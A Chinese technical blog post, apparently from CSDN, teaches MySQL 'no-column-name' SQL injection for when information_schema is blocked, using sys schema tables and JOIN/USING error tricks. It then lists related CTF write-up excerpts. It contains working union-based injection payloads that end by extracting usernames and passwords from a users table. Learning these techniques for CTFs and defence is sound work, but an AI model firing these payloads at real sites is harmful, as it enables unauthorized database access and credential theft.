无列名注入

已于 2024-08-06 13:15:21 修改
阅读量297 收藏 8
点赞数 4
分类专栏: Web渗透 文章标签: 网络
于 2024-08-05 18:21:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adc8848nb/article/details/140933799
版权

无列名注入

当information关键字被禁用,该如何查询数据库名、表名和列名。

我们可以发现,mysql还有其他自带的数据库,我们可以看看用没有我们想要的东西。经过查询后,有一个可疑的表:sys.schema_auto_increment_columns

查询这个表的结构,有我想要的表名和列名

确实可以查询到所有的表名

但再查询列名的时候,就只显示了一个字段

这里既然知道了表名就可以直接查询表的结构,来获取字段。但我们的重点不是在这里,万一desc关键字被禁用了呢?所以我们这主要考虑无列名注入

首先需要使用到mysql的一个知识点内连接,join,语法如下。

SELECT table1.column1, table2.column2

FROM table1

(INNER) JOIN table2

ON table1.common_field = table2.common_field;

JOIN是通过使用从两个表字段共通的值组合连接起来
select * from (select * from users as a join users as b)as c

这里我们直接将两个相同表users的所有列名都进行了查询,当遇到第一个字段就会包列重复的错误

select * from (select * from users as a join users as b using(id))as c;

使用 USING(id) 只会保留一个 id 列在结果中,而不会重复显示,所以第二个字段username会报错


以此执行,往下爆破

转移到实战!!!

查询表名

?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+

或者

?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+

爆字段名

获取第一列的字段名及后面每一列字段名

?id=-1' union select * from (select * from users as a join users as b)as c--+

?id=-1' union select * from (select * from users as a join users as b using(id))as c--+

?id=-1' union select * from (select * from users as a join users as b using(id,username))as c--+

using包含所有的字段,就注入出来了

?id=-1' union select 1,group_concat(username),group_concat(password) from (select * from users as a join users as b using(id,username,password))as c--+

冉0勇
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之无列名注入
weixin_46330722的博客
11-10 4261
列名注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出表名和列名。这时我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。 sys数据库 在5.7以上
SQL无列名注入方法总结(基于union, join)
DawdleD的博客
05-25 2833
本文要点 通过对基于join的无列名注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无列名注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
sql注入之无列名注入
最新发布
m0_68976043的博客
08-05 347
我们在注入的过程中很多时候利用的就是information_schema这个库获取 table_schema table_name, column_name这些数据库内的信息,而在市面上很多厂商的waf会对其进行过滤和黑名单,而我们在不使用information_schema库,那只能去看看mysql中其他与生俱来的库,这个时候sys库就尤为显眼。
SQL无列名注入
qq_66013948的博客
03-03 1145
​ 二次注入就是指以储存(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致注入
sql 无列名注入
xiaolong22333的博客
06-05 688
所谓无列名注入,就是不需要知道列名就能得到数据,通常都是过滤了information,让你无法得到列名 比如下面这个表,当我们不知道列名的情况下要如何得到flag呢?可以通过union来这么做 将user表的原本的3列名字变成1,2,3,将第3列别名为b,然后查询b列 buu上的[SWPU2019]Web1就是这种 但如果过滤了union这么办?还可以用join来注入,这次国赛就是这样(只可惜比赛时我还不会join,没做出来,下定决心赛后好好学学,于是就有了这篇文章。) join 连接两张表 using
SWPU2019 Web1(无列名注入、MariaDB)
weixin_52780973的博客
10-31 1015
sql注入、无列名注入、MariaDB
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1303
information_schema过滤与无列名注入
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4020
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
MySQL在不知道列名情况下的注入详解
09-09
主要给大家介绍了关于MySQL在不知道列名情况下的注入的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用mysql具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
Mysql无列名注入/PDO/变量注入
神隐哥的博客
03-02 557
简介 在mysql=>5版本中有information_schema数据库可以获取库名表名列名,在sql注入中十分常见。当过滤or时。这个库就会被过滤。 在Mysql5.5.x之后。默认使用innodb作为存储引擎 1。 5.6.x之后。innodb加了两个表。分别为 innodb_index_stats innodb_table_stats 这两个表都会存储数据库和对应的表。但是没有列 select group_concat(table_name) from mysql.innodb_ta
列名&位或注入随记
Aiwin的博客
02-07 1021
列名&位或注入随记
mysql注入 join_sql注入(利用join进行无列名注入)
weixin_39622217的博客
01-28 924
select 1,2,3 union select * from sc;select `1` from (select 1,2,3 union select * from sc)a;select `2` from (select 1,2,3 union select * from sc)a;select * from sc;select 1,2,3 union select * from sc;s...
深入浅出带你学习无列名注入
郊眠寺
02-16 1025
今天给大家带来了无列名注入的知识点不知道大家学会了没有,简单来说无列名注入还是挺考察思维的需要我们构造查询的payload并写出脚本,有兴趣的小伙伴不妨自己去试一下,喜欢本文希望可以一键三连支持一下。最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
SQL注入之 无列名注入 原理详解
Jay17的博客
09-17 693
SQL注入之 无列名注入 原理详解
2021-7-26 [SWPU2019]Web1 知识点:mysql无列名注入
m0_51326092的博客
07-26 415
文章目录前言前置知识解题过程总结 前言 其实这道题昨天就做到了,昨天不会做只能去看大佬题解,一开始自己尝试了一会以为是xss,结果看大佬博客发现是mysql的无列名注入,也是经典的留言板二次注入,o(╥﹏╥)o又学习到了新知识点,今天再来复现一遍!(好像BUU复现的题目查询到表名只有一种方法了,比赛时好像有多种) 借鉴的大佬博客: https://www.cnblogs.com/wangtanzhi/p/12241499.html https://www.cnblogs.com/Lee-404/p/128
mysql列名未知注入_MySQL在不知道列名情况下的注入详解
weixin_39996742的博客
02-02 101
前言最近感觉脑子空空,全在为了刷洞去挖洞,还是回归技术的本身让自己舒服些。好了,下面话不多说了,来一起看看详细的介绍吧前提以下情况适用于 MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema库],且已获取到库名和表名① 当只能获取到表名,获取不到列名或者只能获取到无有效内容的列名情况【例如 id】② 当希望通过information_s...
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQL、SQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值